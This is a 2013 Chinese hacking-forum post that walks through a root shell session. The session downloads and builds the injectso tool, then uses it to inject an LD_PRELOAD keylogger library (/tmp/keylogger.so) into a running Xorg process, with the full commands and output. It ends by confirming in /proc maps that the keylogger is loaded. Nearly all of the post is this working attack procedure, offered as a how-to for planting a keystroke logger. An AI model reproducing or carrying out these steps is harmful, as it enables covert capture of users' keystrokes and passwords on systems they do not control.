切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
400 injectso ![复制链接]
发表于 2013-1-21 12:53:06 | 显示全部楼层 |!read_mode!

详细看这个http://fuzzexp.org/linux_injectso_backdoor.html

SO看这个http://www.3g-sec.com/thread-1282-1-1.html


直接上操作


[root@localhost LD_PRELOAD_keylogger]# mv keylogger.so /tmp/
[root@localhost LD_PRELOAD_keylogger]# wget [url]http://lucky.fuzzexp.org/file/misc/injectso-0.52.tgz[/url]
[root@localhost LD_PRELOAD_keylogger]# tar xf injectso-0.52.tgz 
[root@localhost LD_PRELOAD_keylogger]# cd injectso
[root@localhost injectso]# make
gcc -c -Wall -O2 inject.c
inject.c: In function ‘inject_code’:
inject.c:529: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint32_t’
inject.c:529: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 3 has type ‘uint32_t’
inject.c:558: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint32_t’
inject.c:558: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 3 has type ‘uint32_t’
gcc inject.o -o inject -ldl
gcc -c -Wall -O2 -fPIC event.c dlwrap.c
gcc -c -Wall -O2 -fPIC dso-test.c
ld -shared -o event.so event.o dlwrap.o -lpthread
ld -shared -o dso-test.so dso-test.o
[root@localhost injectso]# 


随便输入一个进程


[root@localhost injectso]# ps -ef | grep gdm
root      4039     1  0 17:22 ?        00:00:00 /usr/sbin/gdm-binary -nodaemon
root      4073  4039  0 17:22 ?        00:00:00 /usr/sbin/gdm-binary -nodaemon
root      4075     1  0 17:22 ?        00:00:00 /usr/libexec/gdm-rh-security-token-helper
root      4078  4073  0 17:22 tty7     00:00:09 /usr/bin/Xorg :0 -br -audit 0 -auth /var/gdm/:0.Xauth -nolisten tcp vt7
root     28424 26635  0 20:19 pts/6    00:00:00 grep gdm
[root@localhost injectso]# ./inject -p 4078 -P /tmp/keylogger.so 
injectso v0.52 -- DSO process hotpatching tool

[+] Using /proc/pid/maps method ...
[+] My '__libc_dlopen_mode': 0x2182e0
[+] Foreign libc start: 0x4ef000
[+] => Foreign '__libc_dlopen_mode' address: 0x5f72e0
[+] Using normalized DSO path '/tmp/keylogger.so'
[+] x86 mode
[+] esp=0xbf8f1d6c eip=0x350402
[+] esp=0xbf8f1d70 eip=0x0
[+] done.
[root@localhost injectso]# 


查看


[root@localhost injectso]# cat /proc/4078/maps | grep tmp
00ba1000-00ba3000 r-xp 00000000 08:02 1310526    /tmp/keylogger.so
00ba3000-00ba4000 rwxp 00001000 08:02 1310526    /tmp/keylogger.so
[root@localhost injectso]# 





操千曲而后晓声,观千剑而后识器。
发表于 2014-12-6 10:54:25 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽

代码区

GMT+8, 2019-11-17 08:32

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部